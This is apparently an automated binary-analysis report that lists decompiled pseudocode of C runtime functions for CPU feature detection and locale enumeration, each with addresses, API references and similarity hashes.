C-Code - Quality: 84%

			E00415CB5(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr* _t70;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr* _t83;
				signed int _t84;
				signed int _t87;

				_t81 = __edx;
				 *0x44d7d4 =  *0x44d7d4 & 0x00000000;
				 *0x44b6c0 =  *0x44b6c0 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				 *0x44b6c0 =  *0x44b6c0 | 0x00000002;
				 *0x44d7d4 = 1;
				_t83 =  &_v44;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t83 = 0;
				 *((intOrPtr*)(_t83 + 4)) = 1;
				 *((intOrPtr*)(_t83 + 8)) = 0;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				_v12 = _v44;
				_t51 = 1;
				_t76 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t83 = _t51;
				 *((intOrPtr*)(_t83 + 4)) = _t67;
				 *((intOrPtr*)(_t83 + 8)) = _t76;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
					L9:
					_t84 =  *0x44d7d8; // 0x0
					L10:
					_v28 = _v32;
					_t53 = _v36;
					_v8 = _t53;
					_v24 = _t53;
					if(_v12 >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t70 =  &_v44;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t68;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
						_t60 = _v40;
						_v20 = _t60;
						_t53 = _v8;
						if((_t60 & 0x00000200) != 0) {
							 *0x44d7d8 = _t84 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0x44b6c0 =  *0x44b6c0 | 0x00000004;
						 *0x44d7d4 = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							_v16 = _t53;
							_v12 = _t81;
							if((_v16 & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0x44b6c0; // 0x2f
								_t57 = _t56 | 0x00000008;
								 *0x44d7d4 = 3;
								 *0x44b6c0 = _t57;
								if((_v20 & 0x00000020) != 0) {
									 *0x44d7d4 = 5;
									 *0x44b6c0 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 = _v44 & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t87 =  *0x44d7d8; // 0x0
					_t84 = _t87 | 0x00000001;
					 *0x44d7d8 = _t84;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00415cb5
0x00415cb8
0x00415cc6
0x00415cd5
0x00415e48
0x00415e4e
0x00415e4e
0x00415cdb
0x00415ce1
0x00415cec
0x00415cf2
0x00415cf5
0x00415cf6
0x00415cfa
0x00415cfb
0x00415cfd
0x00415d00
0x00415d03
0x00415d0c
0x00415d2b
0x00415d2e
0x00415d2f
0x00415d30
0x00415d34
0x00415d35
0x00415d37
0x00415d3a
0x00415d3d
0x00415d40
0x00415d85
0x00415d85
0x00415d8b
0x00415d92
0x00415d95
0x00415d98
0x00415d9b
0x00415d9e
0x00415da2
0x00415da5
0x00415da6
0x00415dab
0x00415dae
0x00415db0
0x00415db3
0x00415db6
0x00415db9
0x00415dc1
0x00415dc4
0x00415dc7
0x00415dcc
0x00415dcc
0x00415dc7
0x00415dd9
0x00415ddb
0x00415de2
0x00415df1
0x00415dfc
0x00415dff
0x00415e02
0x00415e13
0x00415e19
0x00415e1e
0x00415e21
0x00415e2f
0x00415e34
0x00415e39
0x00415e43
0x00415e43
0x00415e34
0x00415e13
0x00415df1
0x00000000
0x00415dd9
0x00415d45
0x00415d4f
0x00415d74
0x00415d7a
0x00415d7d
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00415CCE

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: fa158ba9c2f9af3343725a90e63079c4811360940361b3d4aa0183466939a9e0
Instruction ID: a8ce80901a7e4e7b51a83fa1bed7fdff64cdc6cc3c1266408372411fa79d8ce2
Opcode Fuzzy Hash: fa158ba9c2f9af3343725a90e63079c4811360940361b3d4aa0183466939a9e0
Instruction Fuzzy Hash: 6C416AB5D00B09DBEB15CF69E8857EABBF4FB88314F14812BD405E7290D3789980CB98

Uniqueness

Uniqueness Score: 0.08%

Function 0042F856, Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042F856(void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t21;
				signed int _t23;
				signed int _t27;
				signed int _t29;
				signed int _t30;
				void* _t32;
				signed int _t42;
				signed int* _t49;
				int _t53;
				signed int _t55;

				_t61 = __fp0;
				_t15 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t15 ^ _t55;
				_t32 = E004251AF(__ecx, __edx, __fp0);
				_t49 =  *(E004251AF(__ecx, __edx, __fp0) + 0x34c);
				_t53 = E0042F92D(_a4);
				asm("sbb ecx, ecx");
				_t21 = GetLocaleInfoW(_t53, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t21 != 0) {
					_t23 = E0042C37A(_t32, _t49, _t53,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
					_t42 =  *(_t32 + 0x60);
					__eflags = _t23;
					if(_t23 != 0) {
						__eflags = _t42;
						if(_t42 == 0) {
							__eflags =  *((intOrPtr*)(_t32 + 0x5c)) - _t42;
							if( *((intOrPtr*)(_t32 + 0x5c)) != _t42) {
								_t29 = E0042C37A(_t32, _t49, _t53,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
								__eflags = _t29;
								if(__eflags == 0) {
									_push(_t49);
									_push(_t29);
									goto L9;
								}
							}
						}
					} else {
						__eflags = _t42;
						if(__eflags != 0) {
							L10:
							 *_t49 =  *_t49 | 0x00000004;
							__eflags =  *_t49;
							_t49[1] = _t53;
							_t49[2] = _t53;
						} else {
							_push(_t49);
							_push(1);
							L9:
							_push(_t53);
							_t30 = E0042FA86(__eflags, _t61);
							__eflags = _t30;
							if(_t30 != 0) {
								goto L10;
							}
						}
					}
					_t27 =  !( *_t49 >> 2) & 0x00000001;
					__eflags = _t27;
				} else {
					 *_t49 =  *_t49 & _t21;
					_t27 = _t21 + 1;
				}
				E00415A87();
				return _t27;
			}

0x0042f856
0x0042f861
0x0042f868
0x0042f876
0x0042f87e
0x0042f88d
0x0042f899
0x0042f8aa
0x0042f8b2
0x0042f8c3
0x0042f8ca
0x0042f8cd
0x0042f8cf
0x0042f8da
0x0042f8dc
0x0042f8de
0x0042f8e1
0x0042f8ed
0x0042f8f4
0x0042f8f6
0x0042f8f8
0x0042f8f9
0x00000000
0x0042f8f9
0x0042f8f6
0x0042f8e1
0x0042f8d1
0x0042f8d1
0x0042f8d3
0x0042f907
0x0042f907
0x0042f907
0x0042f90a
0x0042f90d
0x0042f8d5
0x0042f8d5
0x0042f8d6
0x0042f8fa
0x0042f8fa
0x0042f8fb
0x0042f903
0x0042f905
0x00000000
0x00000000
0x0042f905
0x0042f8d3
0x0042f917
0x0042f917
0x0042f8b4
0x0042f8b4
0x0042f8b6
0x0042f8b6
0x0042f922
0x0042f92a

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(00000008,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,00000005,000000FF,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 00425252

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042F8AA

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Part of subcall function 0042FA86: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042F81D,00000000,00000000,?), ref: 0042FAB2

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorInfoLastLocale_free$FeaturePresentProcessor___raise_securityfailure
String ID:
API String ID: 114374754-0
Opcode ID: 1c3c496e3779a20dfb65224fff766706adc6fded661aafcd41bab0be8c52b182
Instruction ID: 9c2405d533d8b99ca8e4d401c3f247c778dad9e6f3c92c625ce3d55da2f23f53
Opcode Fuzzy Hash: 1c3c496e3779a20dfb65224fff766706adc6fded661aafcd41bab0be8c52b182
Instruction Fuzzy Hash: EF21F472740126ABDB289A25EC41BBB73B8EF04314B90007FFD05D7241EB399D44CB58

Uniqueness

Uniqueness Score: 0.00%

Function 0042F856, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(?,?,?,0041B27E), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,0041B27E), ref: 00425252

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042F8AA

Part of subcall function 0042FA86: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042F81D,00000000,00000000,?), ref: 0042FAB2

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorInfoLastLocale_free
String ID:
API String ID: 2665345825-0
Opcode ID: 79e2ca517e3856a0451d3ef4e4094c47907fcfbbc3940dd4adc40ee7eb1b95e1
Instruction ID: 9c2405d533d8b99ca8e4d401c3f247c778dad9e6f3c92c625ce3d55da2f23f53
Opcode Fuzzy Hash: 79e2ca517e3856a0451d3ef4e4094c47907fcfbbc3940dd4adc40ee7eb1b95e1
Instruction Fuzzy Hash: EF21F472740126ABDB289A25EC41BBB73B8EF04314B90007FFD05D7241EB399D44CB58

Uniqueness

Uniqueness Score: 0.00%

Function 0042F4DB, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0042F4DB(void* __ecx, void* __edx, void* __eflags, void* __fp0, signed int* _a4) {
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				signed int _t62;

				_t53 = E004251AF(__ecx, __edx, __fp0);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t53 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t53 + 0x54));
				 *(_t53 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t53 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t53 + 0x60) == 0) {
					_t47 = E0042F5D5( *((intOrPtr*)(_t53 + 0x50)));
				}
				 *(_t53 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(E0042F601, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}

0x0042f4e8
0x0042f4ee
0x0042f4ef
0x0042f4f2
0x0042f4f5
0x0042f4f5
0x0042f4f8
0x0042f4fa
0x0042f508
0x0042f50e
0x0042f511
0x0042f514
0x0042f514
0x0042f517
0x0042f519
0x0042f522
0x0042f52d
0x0042f530
0x0042f536
0x0042f541
0x0042f541
0x0042f54a
0x0042f54d
0x0042f555
0x0042f55b
0x0042f55f
0x0042f564
0x0042f568
0x0042f56d
0x0042f56f
0x00000000
0x0042f56f
0x0042f575

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(00000008,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,00000005,000000FF,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 00425252

EnumSystemLocalesW.KERNEL32(0042F601,00000001,00000000,?,004241EB,?,0042FC39,00000000,00000055,?,?), ref: 0042F54D

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLast_free$EnumLocalesSystem
String ID:
API String ID: 1642076358-0
Opcode ID: f5f342fed5517e7bc7e9634be4a5388875b330c625a7deeb380e5c3d0e08bfa0
Instruction ID: be07692734449b4a933b9b40a8835d218e688bbf4e29842885d7c61b9b18d1f9
Opcode Fuzzy Hash: f5f342fed5517e7bc7e9634be4a5388875b330c625a7deeb380e5c3d0e08bfa0
Instruction Fuzzy Hash: 9311363A3007015FDB189F39E89167AB7A1FB80318B94443DE94687B40D375B942C744

Uniqueness

Uniqueness Score: 0.03%

Function 0042FA86, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042FA86(void* __eflags, void* __fp0, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				signed int _t26;
				intOrPtr* _t28;

				_push(_t15);
				_t8 = E004251AF(_t15, _t21, __fp0);
				_t26 = _a4;
				_t23 = _t8;
				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
					L7:
					_t11 = 0;
				} else {
					if(_t26 == _v8 || _a8 == 0) {
						L6:
						_t11 = 1;
					} else {
						_t28 =  *((intOrPtr*)(_t23 + 0x50));
						_t19 = _t28 + 2;
						do {
							_t13 =  *_t28;
							_t28 = _t28 + 2;
						} while (_t13 != 0);
						if(E0042F5D5( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
							goto L7;
						} else {
							goto L6;
						}
					}
				}
				return _t11;
			}

0x0042fa8b
0x0042fa8e
0x0042fa93
0x0042fa96
0x0042faba
0x0042faee
0x0042faee
0x0042fabc
0x0042fabf
0x0042fae9
0x0042faeb
0x0042fac7
0x0042fac7
0x0042faca
0x0042facd
0x0042facd
0x0042fad0
0x0042fad3
0x0042fae7
0x00000000
0x00000000
0x00000000
0x00000000
0x0042fae7
0x0042fabf
0x0042faf5

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(00000008,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,00000005,000000FF,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 00425252

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042F81D,00000000,00000000,?), ref: 0042FAB2

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 1c0f5a2290f1e7d1fc97a3005e12851243b889177dbed28cb2450b9db2a5a593
Instruction ID: 93f7f65bba4ac5eaae1a480776e6ebc5425be3bc588466897e0011fee024592c
Opcode Fuzzy Hash: 1c0f5a2290f1e7d1fc97a3005e12851243b889177dbed28cb2450b9db2a5a593
Instruction Fuzzy Hash: 74F04932B10221BBDF245A65AC06BBB7778EB40314FD5053BEC0AE3240EA78BD05C694

Uniqueness

Uniqueness Score: 0.00%

Function 0042FA86, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(?,?,?,0041B27E), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,0041B27E), ref: 00425252

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042F81D,00000000,00000000,?), ref: 0042FAB2

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 4db37ef504767c506ba3921128c1252b395d72393a81a85c2a8ab5ea823c30aa
Instruction ID: 93f7f65bba4ac5eaae1a480776e6ebc5425be3bc588466897e0011fee024592c
Opcode Fuzzy Hash: 4db37ef504767c506ba3921128c1252b395d72393a81a85c2a8ab5ea823c30aa
Instruction Fuzzy Hash: 74F04932B10221BBDF245A65AC06BBB7778EB40314FD5053BEC0AE3240EA78BD05C694

Uniqueness

Uniqueness Score: 0.00%

Function 0042F576, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042F576(void* __ecx, void* __edx, void* __eflags, void* __fp0, signed char* _a4) {
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_t26 = E004251AF(__ecx, __edx, __fp0);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t26 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t26 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E0042F5D5( *((intOrPtr*)(_t26 + 0x50)));
				}
				 *((intOrPtr*)(_t26 + 0x5c)) = _t24;
				EnumSystemLocalesW(E0042F856, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}

0x0042f583
0x0042f589
0x0042f58a
0x0042f58d
0x0042f590
0x0042f590
0x0042f593
0x0042f595
0x0042f5a3
0x0042f5a6
0x0042f5a9
0x0042f5b4
0x0042f5b4
0x0042f5bd
0x0042f5c0
0x0042f5c6
0x0042f5cc
0x0042f5ce
0x00000000
0x0042f5ce
0x0042f5d4

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(00000008,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,00000005,000000FF,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 00425252

EnumSystemLocalesW.KERNEL32(0042F856,00000001,?,?,004241EB,?,0042FBFD,004241EB,00000055,?,?,?,?,004241EB,?,?), ref: 0042F5C0

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLast_free$EnumLocalesSystem
String ID:
API String ID: 1642076358-0
Opcode ID: f84b3db82476742d361ef12cade83c06fa6238c60335fc09cad0ecf73d3b81d5
Instruction ID: cd6862bdb7207a514c7430135193a8af3c8b5877534af380457c06405d0632b6
Opcode Fuzzy Hash: f84b3db82476742d361ef12cade83c06fa6238c60335fc09cad0ecf73d3b81d5
Instruction Fuzzy Hash: 7EF046363003146FDB246F35EC81A7BBBA1EF80768F85443EF9058B681D6B5AC42CB48

Uniqueness

Uniqueness Score: 0.03%

Function 0042F490, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042F490(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;
				void* _t27;

				_t19 = E004251AF(__ecx, __edx, _t27);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t21 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t21 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x42f3e7, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}

0x0042f49c
0x0042f4a0
0x0042f4a3
0x0042f4a6
0x0042f4a6
0x0042f4a9
0x0042f4ac
0x0042f4c4
0x0042f4c7
0x0042f4cd
0x0042f4d3
0x0042f4d5
0x00000000
0x0042f4d5
0x0042f4da

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(00000008,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,00000005,000000FF,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 00425252

EnumSystemLocalesW.KERNEL32(0042F3E7,00000001,?,?,?,0042FC5B,004241EB,00000055,?,?,?,?,004241EB,?,?,?), ref: 0042F4C7

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLast_free$EnumLocalesSystem
String ID:
API String ID: 1642076358-0
Opcode ID: ee266d20466636ed3ae7240ea1a226fed9acc1586e1f19220add75417ea373df
Instruction ID: 515483087eb61c2d4faccb70fd48e6016745b1362373785f9750674e2a54478b
Opcode Fuzzy Hash: ee266d20466636ed3ae7240ea1a226fed9acc1586e1f19220add75417ea373df
Instruction Fuzzy Hash: 63F0553A30021957CB04AF35E845B6BBFA0EFC1724B8640BAFF06CB680C2799842C754

Uniqueness

Uniqueness Score: 0.03%

Function 0042F490, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(?,?,?,0041B27E), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,0041B27E), ref: 00425252

EnumSystemLocalesW.KERNEL32(0042F3E7,00000001,?,?,?,0042FC5B,AB,00000055,?,?,?,?,004241EB,?,?,?), ref: 0042F4C7

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorLast_free$EnumLocalesSystem
String ID:
API String ID: 1642076358-0
Opcode ID: 6568074a8b53932aed6af79697798815a56149464f6512df576402a13de392b1
Instruction ID: 515483087eb61c2d4faccb70fd48e6016745b1362373785f9750674e2a54478b
Opcode Fuzzy Hash: 6568074a8b53932aed6af79697798815a56149464f6512df576402a13de392b1
Instruction Fuzzy Hash: 63F0553A30021957CB04AF35E845B6BBFA0EFC1724B8640BAFF06CB680C2799842C754

Uniqueness

Uniqueness Score: 0.03%

Function 00425845, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425845(void* __eflags) {
				int _t15;
				intOrPtr _t16;
				void* _t23;

				E00416050(0x448460, 0xc);
				 *(_t23 - 0x1c) =  *(_t23 - 0x1c) & 0x00000000;
				E0042094E( *((intOrPtr*)( *((intOrPtr*)(_t23 + 8)))));
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				 *0x44df70 = E004258B7( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 0xc)))))));
				_t15 = EnumSystemLocalesW(E00425838, 1);
				_t16 =  *0x44b6b4; // 0x4a5cc10f
				 *0x44df70 = _t16;
				 *(_t23 - 0x1c) = _t15;
				 *(_t23 - 4) = 0xfffffffe;
				E004258AB();
				return E00416096();
			}

0x0042584c
0x00425851
0x0042585a
0x00425860
0x00425871
0x0042587d
0x00425885
0x0042588a
0x0042588f
0x00425892
0x00425899
0x004258a5

APIs

Part of subcall function 0042094E: EnterCriticalSection.KERNEL32(-0003A4D4,?,004223A9,00000000,004482A0,0000000C,00422370,?,?,00420F31,?,?,00425351,00000001,00000364,00000005), ref: 0042095D

EnumSystemLocalesW.KERNEL32(00425838,00000001,00448460,0000000C,00425CD1,00000000), ref: 0042587D

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 4a9d8a5ad4a35d5eb35d5121edd9c7e19d5376b27349ef1eeec0c7d45fc64ce0
Instruction ID: 39d5c8221a65253c12b4579c19f521ce25332ee6067a92baf5e0ef13c534ddfc
Opcode Fuzzy Hash: 4a9d8a5ad4a35d5eb35d5121edd9c7e19d5376b27349ef1eeec0c7d45fc64ce0
Instruction Fuzzy Hash: 2BF05E75A00214EFE710EFA9E802B8D7BF0EF09325F10416AF815DB2A1CBB88941CF49

Uniqueness

